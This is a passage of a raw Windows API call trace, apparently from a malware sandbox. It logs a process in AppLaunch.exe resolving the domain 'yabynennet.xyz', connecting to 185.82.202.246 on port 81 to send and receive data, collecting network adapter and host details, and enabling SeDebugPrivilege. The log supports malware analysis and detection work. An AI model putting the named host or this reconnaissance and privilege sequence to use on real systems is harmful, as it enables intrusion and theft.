protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x238 [0251.827] setsockopt (s=0x238, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0251.827] closesocket (s=0x238) returned 0 [0251.827] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x238 [0251.833] setsockopt (s=0x238, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0251.833] closesocket (s=0x238) returned 0 [0251.842] GetCurrentProcess () returned 0xffffffff [0251.842] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e158 | out: TokenHandle=0x43e158*=0x238) returned 1 [0251.906] CloseHandle (hObject=0x238) returned 1 [0251.906] GetCurrentProcess () returned 0xffffffff [0251.907] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e170 | out: TokenHandle=0x43e170*=0x238) returned 1 [0251.907] CloseHandle (hObject=0x238) returned 1 [0251.927] GetAddrInfoW (in: pNodeName="yabynennet.xyz", pServiceName=0x0, pHints=0x43e540*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x43e4e8 | out: ppResult=0x43e4e8*=0x558df0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="yabynennet.xyz", ai_addr=0x558a38*(sa_family=2, sin_port=0x0, sin_addr="185.82.202.246"), ai_next=0x0)) returned 0 [0251.981] FreeAddrInfoW (pAddrInfo=0x558df0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="yabynennet.xyz", ai_addr=0x558a38*(sa_family=2, sin_port=0x0, sin_addr="185.82.202.246"), ai_next=0x0)) [0251.986] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x264 [0251.992] WSAConnect (in: s=0x264, name=0x265bc8c*(sa_family=2, sin_port=0x51, sin_addr="185.82.202.246"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0252.016] setsockopt (s=0x264, level=65535, optname=4098, optval="", optlen=4) returned 0 [0252.016] setsockopt (s=0x264, level=65535, optname=4097, optval="", optlen=4) returned 0 [0252.018] setsockopt (s=0x264, level=6, optname=1, optval="\x01", optlen=4) returned 0 [0252.018] setsockopt (s=0x264, level=65535, optname=4101, optval="6v\x1b", optlen=4) returned 0 [0252.018] send (s=0x264, buf=0x264e9b0*, len=38, flags=0) returned 38 [0252.020] setsockopt (s=0x264, level=65535, optname=4102, optval="6v\x1b", optlen=4) returned 0 [0252.020] recv (in: s=0x264, buf=0x267c188, len=1, flags=0 | out: buf=0x267c188*) returned 1 [0252.060] send (s=0x264, buf=0x267cb27*, len=203, flags=0) returned 203 [0252.061] recv (in: s=0x264, buf=0x267e0bc, len=8192, flags=0 | out: buf=0x267e0bc*) returned 142 [0257.138] CoCreateGuid (in: pguid=0x43e8f4 | out: pguid=0x43e8f4*(Data1=0x4b284cb, Data2=0xe1c0, Data3=0x4c22, Data4=([0]=0xa1, [1]=0x3, [2]=0x58, [3]=0xec, [4]=0x81, [5]=0x45, [6]=0xc4, [7]=0x9a))) returned 0x0 [0257.138] CoCreateGuid (in: pguid=0x43e838 | out: pguid=0x43e838*(Data1=0x962e6370, Data2=0xa527, Data3=0x4dbb, Data4=([0]=0xab, [1]=0x30, [2]=0xa2, [3]=0xdf, [4]=0xac, [5]=0xc, [6]=0x78, [7]=0x28))) returned 0x0 [0257.139] send (s=0x264, buf=0x267cb27*, len=154, flags=0) returned 154 [0257.140] recv (in: s=0x264, buf=0x267e0bc, len=8192, flags=0 | out: buf=0x267e0bc*) returned 2896 [0257.160] recv (in: s=0x264, buf=0x267e0bc, len=8192, flags=0 | out: buf=0x267e0bc*) returned 802 [0257.199] GetCurrentProcess () returned 0xffffffff [0257.199] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e120 | out: TokenHandle=0x43e120*=0x268) returned 1 [0257.201] CloseHandle (hObject=0x268) returned 1 [0257.201] GetCurrentProcess () returned 0xffffffff [0257.202] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e138 | out: TokenHandle=0x43e138*=0x268) returned 1 [0257.202] CloseHandle (hObject=0x268) returned 1 [0258.271] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x43eae0 | out: pFixedInfo=0x0, pOutBufLen=0x43eae0) returned 0x6f [0258.304] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x555590 [0258.305] GetNetworkParams (in: pFixedInfo=0x555590, pOutBufLen=0x43eae0 | out: pFixedInfo=0x555590, pOutBufLen=0x43eae0) returned 0x0 [0258.320] LocalFree (hMem=0x555590) returned 0x0 [0258.321] GetAdaptersAddresses (in: Family=0x0, Flags=0xc0, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x43ebe4*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x43ebe4*=0xb0c) returned 0x6f [0258.332] LocalAlloc (uFlags=0x0, uBytes=0xb0c) returned 0x55d780 [0258.332] GetAdaptersAddresses (in: Family=0x0, Flags=0xc0, Reserved=0x0, AdapterAddresses=0x55d780, SizePointer=0x43ebe4*=0xb0c | out: AdapterAddresses=0x55d780*(Alignment=0xf00000178, Length=0x178, IfIndex=0xf, Next=0x55dc18, AdapterName="{2E4C7576-F100-4C39-A70C-5E6D4E6BF9B7}", FirstUnicastAddress=0x55d9c0, FirstAnycastAddress=0x0, FirstMulticastAddress=0x55da4c, FirstDnsServerAddress=0x55dbc8, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #4", FriendlyName="Local Area Connection 4", PhysicalAddress=([0]=0x0, [1]=0x19, [2]=0x7a, [3]=0x46, [4]=0x53, [5]=0x4c, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xf, ZoneIndices=([0]=0xf, [1]=0xf, [2]=0xf, [3]=0xf, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x55dbf0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000009000000, Dhcpv4Server.lpSockaddr=0x55d8f8*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x27, [5]=0xbf, [6]=0xe, [7]=0x9e, [8]=0x0, [9]=0x26, [10]=0x67, [11]=0xd5, [12]=0xc6, [13]=0x31, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x12c89f1d, FirstDnsSuffix=0x0), SizePointer=0x43ebe4*=0xb0c) returned 0x0 [0258.359] GetPerAdapterInfo (in: IfIndex=0xf, pPerAdapterInfo=0x0, pOutBufLen=0x43e84c | out: pPerAdapterInfo=0x0, pOutBufLen=0x43e84c) returned 0x6f [0258.462] LocalAlloc (uFlags=0x0, uBytes=0x5c) returned 0x50e430 [0258.462] GetPerAdapterInfo (in: IfIndex=0xf, pPerAdapterInfo=0x50e430, pOutBufLen=0x43e84c | out: pPerAdapterInfo=0x50e430, pOutBufLen=0x43e84c) returned 0x0 [0258.477] LocalFree (hMem=0x50e430) returned 0x0 [0258.480] GetPerAdapterInfo (in: IfIndex=0x1, pPerAdapterInfo=0x0, pOutBufLen=0x43e84c | out: pPerAdapterInfo=0x0, pOutBufLen=0x43e84c) returned 0x6f [0258.493] LocalAlloc (uFlags=0x0, uBytes=0x5c) returned 0x50e430 [0258.493] GetPerAdapterInfo (in: IfIndex=0x1, pPerAdapterInfo=0x50e430, pOutBufLen=0x43e84c | out: pPerAdapterInfo=0x50e430, pOutBufLen=0x43e84c) returned 0x0 [0258.507] LocalFree (hMem=0x50e430) returned 0x0 [0258.508] LocalFree (hMem=0x55d780) returned 0x0 [0258.551] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x26c [0258.551] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x268 [0258.561] GetCurrentProcess () returned 0xffffffff [0258.562] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e7bc | out: TokenHandle=0x43e7bc*=0x278) returned 1 [0258.565] CloseHandle (hObject=0x278) returned 1 [0258.590] GetCurrentProcess () returned 0xffffffff [0258.591] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e7d4 | out: TokenHandle=0x43e7d4*=0x278) returned 1 [0258.591] CloseHandle (hObject=0x278) returned 1 [0258.649] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x43dcac | out: phkResult=0x43dcac*=0x278) returned 0x0 [0258.650] RegQueryValueExW (in: hKey=0x278, lpValueName="InstallationType", lpReserved=0x0, lpType=0x43dccc, lpData=0x0, lpcbData=0x43dcc8*=0x0 | out: lpType=0x43dccc*=0x1, lpData=0x0, lpcbData=0x43dcc8*=0xe) returned 0x0 [0258.650] RegQueryValueExW (in: hKey=0x278, lpValueName="InstallationType", lpReserved=0x0, lpType=0x43dccc, lpData=0x26b9448, lpcbData=0x43dcc8*=0xe | out: lpType=0x43dccc*=0x1, lpData="Client", lpcbData=0x43dcc8*=0xe) returned 0x0 [0258.651] RegCloseKey (hKey=0x278) returned 0x0 [0258.654] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea78 | out: phkResult=0x43ea78*=0x278) returned 0x0 [0258.655] RegQueryValueExW (in: hKey=0x278, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x43ea94, lpData=0x0, lpcbData=0x43ea90*=0x0 | out: lpType=0x43ea94*=0x0, lpData=0x0, lpcbData=0x43ea90*=0x0) returned 0x2 [0258.655] RegCloseKey (hKey=0x278) returned 0x0 [0258.658] GetCurrentProcessId () returned 0xfc8 [0258.663] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x43e314 | out: lpLuid=0x43e314*(LowPart=0x14, HighPart=0)) returned 1 [0258.666] GetCurrentProcess () returned 0xffffffff [0258.666] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x43e310 | out: TokenHandle=0x43e310*=0x278) returned 1 [0258.667] AdjustTokenPrivileges (in: TokenHandle=0x278, DisableAllPrivileges=0, NewState=0x26ba4c8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0258.667] CloseHandle (hObject=0x278) returned 1 [0258.670] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfc8) returned 0x278 [0258.709] EnumProcessModules (in: hProcess=0x278, lphModule=0x26ba50c, cb=0x100, lpcbNeeded=0x43ea84 | out: lphModule=0x26ba50c, lpcbNeeded=0x43ea84) returned 1 [0258.711] GetModuleInformation (in: hProcess=0x278, hModule=0x70000, lpmodinfo=0x26ba64c, cb=0xc | out: lpmodinfo=0x26ba64c*(lpBaseOfDll=0x70000, SizeOfImage=0x20000, EntryPoint=0x891a6)) returned 1 [0258.712] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.712] GetModuleBaseNameW (in: hProcess=0x278, hModule=0x70000, lpBaseName=0x561db0, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0258.713] CoTaskMemFree (pv=0x561db0) [0258.714] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.714] GetModuleFileNameExW (in: hProcess=0x278, hModule=0x70000, lpFilename=0x561db0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0258.714] CoTaskMemFree (pv=0x561db0) [0258.714] CloseHandle (hObject=0x278) returned 1 [0258.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x43e5ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0258.715] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseHttpPipeliningAndBufferPooling", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea7c | out: phkResult=0x43ea7c*=0x0) returned 0x2 [0258.716] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea7c | out: phkResult=0x43ea7c*=0x278) returned 0x0 [0258.716] RegQueryValueExW (in: hKey=0x278, lpValueName="UseHttpPipeliningAndBufferPooling", lpReserved=0x0, lpType=0x43ea98, lpData=0x0, lpcbData=0x43ea94*=0x0 | out: lpType=0x43ea98*=0x0, lpData=0x0, lpcbData=0x43ea94*=0x0) returned 0x2 [0258.716] RegCloseKey (hKey=0x278) returned 0x0 [0258.717] GetCurrentProcessId () returned 0xfc8 [0258.717] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfc8) returned 0x278 [0258.717] EnumProcessModules (in: hProcess=0x278, lphModule=0x26bd124, cb=0x100, lpcbNeeded=0x43ea84 | out: lphModule=0x26bd124, lpcbNeeded=0x43ea84) returned 1 [0258.718] GetModuleInformation (in: hProcess=0x278, hModule=0x70000, lpmodinfo=0x26bd264, cb=0xc | out: lpmodinfo=0x26bd264*(lpBaseOfDll=0x70000, SizeOfImage=0x20000, EntryPoint=0x891a6)) returned 1 [0258.718] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.718] GetModuleBaseNameW (in: hProcess=0x278, hModule=0x70000, lpBaseName=0x561db0, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0258.719] CoTaskMemFree (pv=0x561db0) [0258.719] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.719] GetModuleFileNameExW (in: hProcess=0x278, hModule=0x70000, lpFilename=0x561db0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0258.719] CoTaskMemFree (pv=0x561db0) [0258.719] CloseHandle (hObject=0x278) returned 1 [0258.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x43e5ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0258.720] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseSafeSynchronousClose", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea7c | out: phkResult=0x43ea7c*=0x0) returned 0x2 [0258.720] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea7c | out: phkResult=0x43ea7c*=0x278) returned 0x0 [0258.720] RegQueryValueExW (in: hKey=0x278, lpValueName="UseSafeSynchronousClose", lpReserved=0x0, lpType=0x43ea98, lpData=0x0, lpcbData=0x43ea94*=0x0 | out: lpType=0x43ea98*=0x0, lpData=0x0, lpcbData=0x43ea94*=0x0) returned 0x2 [0258.720] RegCloseKey (hKey=0x278) returned 0x0 [0258.721] GetCurrentProcessId () returned 0xfc8 [0258.721] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfc8) returned 0x278 [0258.721] EnumProcessModules (in: hProcess=0x278, lphModule=0x26bfbfc, cb=0x100, lpcbNeeded=0x43ea84 | out: lphModule=0x26bfbfc, lpcbNeeded=0x43ea84) returned 1 [0258.723] GetModuleInformation (in: hProcess=0x278, hModule=0x70000, lpmodinfo=0x26bfd3c, cb=0xc | out: lpmodinfo=0x26bfd3c*(lpBaseOfDll=0x70000, SizeOfImage=0x20000, EntryPoint=0x891a6)) returned 1 [0258.724] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.724] GetModuleBaseNameW (in: hProcess=0x278, hModule=0x70000, lpBaseName=0x561db0, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0258.724] CoTaskMemFree (pv=0x561db0) [0258.724] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.724] GetModuleFileNameExW (in: hProcess=0x278, hModule=0x70000, lpFilename=0x561db0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0258.724] CoTaskMemFree (pv=0x561db0) [0258.724] CloseHandle (hObject=0x278) returned 1 [0258.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x43e5ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0258.726] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseStrictRfcInterimResponseHandling", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea7c | out: phkResult=0x43ea7c*=0x0) returned 0x2 [0258.726] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea7c | out: phkResult=0x43ea7c*=0x278) returned 0x0 [0258.726] RegQueryValueExW (in: hKey=0x278, lpValueName="UseStrictRfcInterimResponseHandling", lpReserved=0x0, lpType=0x43ea98, lpData=0x0, lpcbData=0x43ea94*=0x0 | out: lpType=0x43ea98*=0x0, lpData=0x0, lpcbData=0x43ea94*=0x0) returned 0x2 [0258.726] RegCloseKey (hKey=0x278) returned 0x0 [0258.726] GetCurrentProcessId () returned 0xfc8 [0258.727] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfc8) returned 0x278 [0258.727] EnumProcessModules (in: hProcess=0x278, lphModule=0x26c26c0, cb=0x100, lpcbNeeded=0x43ea84 | out: lphModule=0x26c26c0, lpcbNeeded=0x43ea84) returned 1 [0258.728] GetModuleInformation (in: hProcess=0x278, hModule=0x70000, lpmodinfo=0x26c2800, cb=0xc | out: lpmodinfo=0x26c2800*(lpBaseOfDll=0x70000, SizeOfImage=0x20000, EntryPoint=0x891a6)) returned 1 [0258.728] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.728] GetModuleBaseNameW (in: hProcess=0x278, hModule=0x70000, lpBaseName=0x561db0, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0258.728] CoTaskMemFree (pv=0x561db0) [0258.728] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.728] GetModuleFileNameExW (in: hProcess=0x278, hModule=0x70000, lpFilename=0x561db0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0258.729] CoTaskMemFree (pv=0x561db0) [0258.729] CloseHandle (hObject=0x278) returned 1 [0258.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x43e5ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0258.729] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.AllowDangerousUnicodeDecompositions", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea7c | out: phkResult=0x43ea7c*=0x0) returned 0x2 [0258.730] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea7c | out: phkResult=0x43ea7c*=0x278) returned 0x0 [0258.730] RegQueryValueExW (in: hKey=0x278, lpValueName="AllowDangerousUnicodeDecompositions", lpReserved=0x0, lpType=0x43ea98, lpData=0x0, lpcbData=0x43ea94*=0x0 | out: lpType=0x43ea98*=0x0, lpData=0x0, lpcbData=0x43ea94*=0x0) returned 0x2 [0258.730] RegCloseKey (hKey=0x278) returned 0x0 [0258.730] GetCurrentProcessId () returned 0xfc8 [0258.731] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfc8) returned 0x278 [0258.731] EnumProcessModules (in: hProcess=0x278, lphModule=0x26c50f8, cb=0x100, lpcbNeeded=0x43ea84 | out: lphModule=0x26c50f8, lpcbNeeded=0x43ea84) returned 1 [0258.732] GetModuleInformation (in: hProcess=0x278, hModule=0x70000, lpmodinfo=0x26c5238, cb=0xc | out: lpmodinfo=0x26c5238*(lpBaseOfDll=0x70000, SizeOfImage=0x20000, EntryPoint=0x891a6)) returned 1 [0258.732] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.732] GetModuleBaseNameW (in: hProcess=0x278, hModule=0x70000, lpBaseName=0x561db0, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0258.732] CoTaskMemFree (pv=0x561db0) [0258.732] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.732] GetModuleFileNameExW (in: hProcess=0x278, hModule=0x70000, lpFilename=0x561db0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0258.733] CoTaskMemFree (pv=0x561db0) [0258.733] CloseHandle (hObject=0x278) returned 1 [0258.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x43e5ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0258.733] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.UseStrictIPv6AddressParsing", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea7c | out: phkResult=0x43ea7c*=0x0) returned 0x2 [0258.734] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea7c | out: phkResult=0x43ea7c*=0x278) returned 0x0 [0258.734] RegQueryValueExW (in: hKey=0x278, lpValueName="UseStrictIPv6AddressParsing", lpReserved=0x0, lpType=0x43ea98, lpData=0x0, lpcbData=0x43ea94*=0x0 | out: lpType=0x43ea98*=0x0, lpData=0x0, lpcbData=0x43ea94*=0x0) returned 0x2 [0258.734] RegCloseKey (hKey=0x278) returned 0x0 [0258.734] GetCurrentProcessId () returned 0xfc8 [0258.734] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfc8) returned 0x278 [0258.735] EnumProcessModules (in: hProcess=0x278, lphModule=0x26c7b14, cb=0x100, lpcbNeeded=0x43ea84 | out: lphModule=0x26c7b14, lpcbNeeded=0x43ea84) returned 1 [0258.736] GetModuleInformation (in: hProcess=0x278, hModule=0x70000, lpmodinfo=0x26c7c54, cb=0xc | out: lpmodinfo=0x26c7c54*(lpBaseOfDll=0x70000, SizeOfImage=0x20000, EntryPoint=0x891a6)) returned 1 [0258.736] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.736] GetModuleBaseNameW (in: hProcess=0x278, hModule=0x70000, lpBaseName=0x561db0, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0258.736] CoTaskMemFree (pv=0x561db0) [0258.736] CoTaskMemAlloc (cb=0x804) returned 0x561db0 [0258.736] GetModuleFileNameExW (in: hProcess=0x278, hModule=0x70000, lpFilename=0x561db0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0258.737] CoTaskMemFree (pv=0x561db0) [0258.737] CloseHandle (hObject=0x278) returned 1 [0258.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x43e5ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0258.737] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.AllowAllUriEncodingExpansion", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea7c | out: phkResult=0x43ea7c*=0x0) returned 0x2 [0258.738] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x43ea7c | out: phkResult=0x43ea7c*=0x278) returned 0x0 [0258.738] RegQueryValueExW (in: hKey=0x278, lpValueName="AllowAllUriEncodingExpansion", lpReserved=0x0, lpType=0x43ea98, lpData=0x0, lpcbData=0x43ea94*=0x0 | out: lpType=0x43ea98*=0x0, lpData=0x0, lpcbData=0x43ea94*=0x0) returned 0x2 [0258.738] RegCloseKey (hKey=0x278) returned 0x0 [0258.745] 